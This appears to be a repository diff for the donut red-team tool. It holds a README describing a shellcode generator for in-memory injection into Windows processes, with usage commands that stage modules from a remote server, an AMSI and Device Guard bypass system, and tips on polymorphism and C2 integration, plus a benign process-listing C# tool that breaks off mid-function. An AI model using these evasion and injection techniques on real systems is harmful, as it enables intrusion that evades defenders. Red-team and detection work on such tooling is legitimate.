41 <!-- Windows 10 -->
42 <!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
43
44 </application>
45 </compatibility>
46
47 <!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
48 DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
49 to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
50 also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
51 <!--
52 <application xmlns="urn:schemas-microsoft-com:asm.v3">
53 <windowsSettings>
54 <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
55 </windowsSettings>
56 </application>
57 -->
58
59 <!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
60 <!--
61 <dependency>
62 <dependentAssembly>
63 <assemblyIdentity
64 type="win32"
65 name="Microsoft.Windows.Common-Controls"
66 version="6.0.0.0"
67 processorArchitecture="*"
68 publicKeyToken="6595b64144ccf1df"
69 language="*"
70 />
71 </dependentAssembly>
72 </dependency>
73 -->
74
75 </assembly>
ModuleMonitor/img/detected.png less more
Binary diff not shown
+0
-264
PKG-INFO less more
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
+6
-0
ProcessManager/App.config less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3
4 <supportedRuntime version="v2.0.50727"/></startup>
5 </configuration>
+29
-0
ProcessManager/LICENSE less more
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+57
-0
ProcessManager/ProcessManager.csproj less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{98CA74C7-A074-434D-9772-75896E73CEAA}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ProcessManager</RootNamespace>
9 <AssemblyName>ProcessManager</AssemblyName>
10 <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 <Prefer32Bit>false</Prefer32Bit>
26 </PropertyGroup>
27 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
28 <PlatformTarget>AnyCPU</PlatformTarget>
29 <DebugType>pdbonly</DebugType>
30 <Optimize>true</Optimize>
31 <OutputPath>bin\Release\</OutputPath>
32 <DefineConstants>TRACE</DefineConstants>
33 <ErrorReport>prompt</ErrorReport>
34 <WarningLevel>4</WarningLevel>
35 <Prefer32Bit>false</Prefer32Bit>
36 </PropertyGroup>
37 <ItemGroup>
38 <Reference Include="System" />
39 <Reference Include="System.Core" />
40 <Reference Include="System.Management" />
41 <Reference Include="System.Xml.Linq" />
42 <Reference Include="System.Data.DataSetExtensions" />
43 <Reference Include="Microsoft.CSharp" />
44 <Reference Include="System.Data" />
45 <Reference Include="System.Net.Http" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="App.config" />
54 </ItemGroup>
55 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
56 </Project>
+11
-0
ProcessManager/ProcessManager.csproj.user less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|AnyCPU'">
3 <StartArguments>
4 </StartArguments>
5 </PropertyGroup>
6 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
7 <StartArguments>
8 </StartArguments>
9 </PropertyGroup>
10 </Project>
+25
-0
ProcessManager/ProcessManager.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager.csproj", "{98CA74C7-A074-434D-9772-75896E73CEAA}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {EA625DA1-2E6D-4092-B504-DEE5CD2E9F43}
23 EndGlobalSection
24 EndGlobal
+579
-0
ProcessManager/Program.cs less more
0 /** Name: ProcessManager
1 * Author: TheWover
2 * Description: Displays useful information about processes running on a local or remote machine.
3 *
4 * Last Modified: 04/13/2018
5 *
6 */
7
8 using System;
9 using System.Linq;
10 using System.Diagnostics;
11 using System.Runtime.InteropServices;
12 using System.ComponentModel;
13 using System.Security.Principal;
14
15 namespace ProcessManager
16 {
17
18 class Program
19 {
20 private struct Arguments
21 {
22 public string processname;
23 public string machinename;
24 public bool help;
25 }
26
27 static void Main(string[] args)
28 {
29 //Parse command-line arguments
30 Arguments arguments = ParseArgs(args);
31
32 if (args.Length > 0)
33 {
34 if (arguments.help == true)
35 {
36 PrintUsage();
37 Environment.Exit(0);
38 }
39
40 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity", "User");
41
42 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
43 if (arguments.machinename != null)
44 {
45 try
46 {
47 if (arguments.processname != null)
48
49 //Enumerate the processes
50 DescribeProcesses(Process.GetProcessesByName(arguments.processname, arguments.machinename));
51 else
52
53 //Enumerate the processes
54 DescribeProcesses(Process.GetProcesses(arguments.machinename));
55 }
56 catch
57 {
58 Console.WriteLine("Error: Invalid machine name.");
59
60 Environment.Exit(1);
61 }
62 }
63 else
64 {
65 if (arguments.processname != null)
66 //Enumerate the processes
67 DescribeProcesses(Process.GetProcessesByName(arguments.processname));
68 else
69 //Enumerate the processes
70 DescribeProcesses(Process.GetProcesses());
71 }
72
73 }
74 else
75 {
76 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity" , "User");
77
78 DescribeProcesses(Process.GetProcesses());
79 }
80 }
81
82 private static Arguments ParseArgs(string[] args)
83 {
84 Arguments arguments = new Arguments();
85 arguments.help = false;
86 arguments.machinename = null;
87 arguments.processname = null;
88
89 if (args.Length > 0)
90 {
91 if (args.Contains("--help") || args.Contains("-h"))
92 {
93 arguments.help = true;
94 }
95 }
96
97 //Filter by process name
98 if (args.Contains("--name") && args.Length >= 2)
99 {
100 //The number of the command line argument that specifies the process name
101 int nameindex = new System.Collections.Generic.List<string>(args).IndexOf("--name") + 1;
102
103 arguments.processname = args[nameindex];
104 }
105
106 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
107 if (args.Contains("--machine") && args.Length >= 2)
108 {
109 try
110 {
111 //The number of the command line argument that specifies the machine name
112 int machineindex = new System.Collections.Generic.List<string>(args).IndexOf("--machine") + 1;
113
114 arguments.machinename = args[machineindex];
115 }
116 catch
117 {
118 Console.WriteLine("Error: Invalid machine name.");
119
120 Environment.Exit(1);
121 }
122
123 }
124
125 return arguments;
126 }
127
128 private static void PrintUsage()
129 {
130 Console.WriteLine();
131 Console.WriteLine("| Process Manager [v0.2]");
132 Console.WriteLine("| Copyright (c) 2019 TheWover");
133 Console.WriteLine();
134
135 Console.WriteLine("Usage: ProcessManager.exe [machine]");
136 Console.WriteLine();
137
138 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
139 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--machine", "Specify a machine to query. Machine name or IP Address may be used.");
140 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--name", "Filter by a process name.");
141 Console.WriteLine();
142
143 Console.WriteLine("Examples:");
144 Console.WriteLine();
145
146 Console.WriteLine("ProcessManager.exe");
147 Console.WriteLine("ProcessManager.exe --name svchost");
148 Console.WriteLine("ProcessManager.exe --machine workstation2");
149 Console.WriteLine("ProcessManager.exe --machine 10.30.134.13");
150 Console.WriteLine();
151 }
152
153 private static void DescribeProcesses(Process[] processes)
154 {
155
156 //Sort in ascending order by PID
157 processes = processes.OrderBy(p => p.Id).ToArray();
158
159 foreach (Process process in processes)
160 {
161 //Get the PID
162 ProcessDetails details = new ProcessDetails();
163 details.name = process.ProcessName;
164 details.pid = process.Id;
165
166 try
167 {
168 //Get the PPID
169 Process parent = ParentProcessUtilities.GetParentProcess(process.Id);
170 if (parent != null)
171 details.ppid = parent.Id;
172 else
173 details.ppid = -1;
174 }
175 //Parent is no longer running
176 catch (InvalidOperationException)
177 {
178 details.ppid = -1;
179 }
180
181
182 //Check the architecture
183 try
184 {
185 if (ProcessInspector.IsWow64Process(process))
186 details.arch = "x86";
187 else
188 details.arch = "x64";
189 }
190 catch
191 {
192 details.arch = "*";
193 }
194
195 try
196 {
197 //Determine whether or not the process is managed (has the CLR loaded).
198 details.managed = ProcessInspector.IsCLRLoaded(process);
199 }
200 //Process is no longer running
201 catch (InvalidOperationException)
202 {
203 details.managed = false;
204 }
205
206
207 try
208 {
209 //Gets the Session of the Process
210 details.session = process.SessionId;
211 }
212 //Process is no longer running
213 catch (InvalidOperationException)
214 {
215 details.session = -1;
216 }
217
218
219 try
220 {
221 //Gets the Integrity Level of the process
222 details.integrity = TokenInspector.GetIntegrityLevel(process);
223 }
224 //Process is no longer running
225 catch (InvalidOperationException)
226 {
227 details.integrity = TokenInspector.IntegrityLevel.Unknown;
228 }
229
230
231 try
232 {
233 //Gets the User of the Process
234 details.user = ProcessInspector.GetProcessUser(process);
235 }
236 //Process is no longer running
237 catch (InvalidOperationException)
238 {
239 details.user = "";
240 }
241
242 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", details.name, details.pid, details.ppid, details.arch, details.managed, details.session, details.integrity, details.user);
243 }
244 }
245 }
246
247 public struct ProcessDetails
248 {
249 public string name;
250 public int pid;
251 public int ppid;
252 public string arch;
253 public bool managed;
254 public int session;
255 public TokenInspector.IntegrityLevel integrity;
256 public string user;
257 }
258
259 public static class ProcessInspector
260 {
261
262 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
263 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
264
265 [DllImport("ntdll.dll")]
266 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
267
268 [DllImport("advapi32.dll", SetLastError = true)]
269 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
270 [DllImport("kernel32.dll", SetLastError = true)]
271 [return: MarshalAs(UnmanagedType.Bool)]
272 private static extern bool CloseHandle(IntPtr hObject);
273
274 /// <summary>
275 /// Gets the parent process of a specified process.
276 /// </summary>
277 /// <returns>A Process object representing the parent.</returns>
278 public static Process GetParentProcess(Process process)
279 {
280 return ParentProcessUtilities.GetParentProcess(process.Id);
281 }
282
283 /// <summary>
284 /// Gets the parent process of a specified process.
285 /// </summary>
286 /// <returns>A Process object representing the parent.</returns>
287 public static Process GetParentProcess()
288 {
289 return GetParentProcess(Process.GetCurrentProcess());
290 }
291
292 /// <summary>
293 /// Checks whether the process is 64-bit.
294 /// </summary>
295 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
296 public static bool IsWow64Process(Process process)
297 {
298 bool retVal = false;
299 IsWow64Process(process.Handle, out retVal);
300 return retVal;
301 }
302
303 /// <summary>
304 /// Checks whether the process is 64-bit.
305 /// </summary>
306 /// <returns>Returns false if process is 64-bit, and true if process is 32-bit. Refer to MSDN for further details.</returns>
307 public static bool IsWow64Process()
308 {
309 bool retVal = false;
310 IsWow64Process(Process.GetCurrentProcess().Handle, out retVal);
311 return retVal;
312 }
313
314 /// <summary>
315 /// Checks if the CLR has been loaded into the specified process by
316 /// looking for loaded modules that contain "mscor" in the name.
317 /// </summary>
318 /// <param name="process">The process to check.</param>
319 /// <returns>True if the CLR has been loaded. False if it has not.</returns>
320 public static bool IsCLRLoaded(Process process)
321 {
322 try
323 {
324 var modules = from module in process.Modules.OfType<ProcessModule>()
325 select module;
326
327 return modules.Any(pm => pm.ModuleName.Contains("mscor"));
328 }
329 //Access was denied
330 catch (Win32Exception)
331 {
332 return false;
333 }
334 //Process has already exited
335 catch (InvalidOperationException)
336 {
337 return false;
338 }
339
340 }
341
342 /// <summary>
343 /// Gets the owner of a process.
344 ///
345 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
346 /// </summary>
347 /// <param name="process">The process to inspect.</param>
348 /// <returns>The name of the user, or null if it could not be read.</returns>
349 public static string GetProcessUser(Process process)
350 {
351 IntPtr processHandle = IntPtr.Zero;
352 try
353 {
354 OpenProcessToken(process.Handle, 8, out processHandle);
355 WindowsIdentity wi = new WindowsIdentity(processHandle);
356 return wi.Name;
357 }
358 catch
359 {
360 return null;
361 }
362 finally
363 {
364 if (processHandle != IntPtr.Zero)
365 {
366 CloseHandle(processHandle);
367 }
368 }
369 }
370
371 }//end class
372
373 /// <summary>
374 /// A utility class to determine a process parent.
375 /// </summary>
376 [StructLayout(LayoutKind.Sequential)]
377 public struct ParentProcessUtilities
378 {
379 // These members must match PROCESS_BASIC_INFORMATION
380 internal IntPtr Reserved1;
381 internal IntPtr PebBaseAddress;
382 internal IntPtr Reserved2_0;
383 internal IntPtr Reserved2_1;
384 internal IntPtr UniqueProcessId;
385 internal IntPtr InheritedFromUniqueProcessId;
386
387 [DllImport("ntdll.dll")]
388 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
389
390 /// <summary>
391 /// Gets the parent process of the current process.
392 /// </summary>
393 /// <returns>An instance of the Process class.</returns>
394 public static Process GetParentProcess()
395 {
396 return GetParentProcess(Process.GetCurrentProcess().Handle);
397 }
398
399 /// <summary>
400 /// Gets the parent process of specified process.
401 /// </summary>
402 /// <param name="id">The process id.</param>
403 /// <returns>An instance of the Process class.</returns>
404 public static Process GetParentProcess(int id)
405 {
406 try
407 {
408 Process process = Process.GetProcessById(id);
409
410 GetParentProcess(process.Handle);
411
412 return GetParentProcess(process.Handle);
413 }
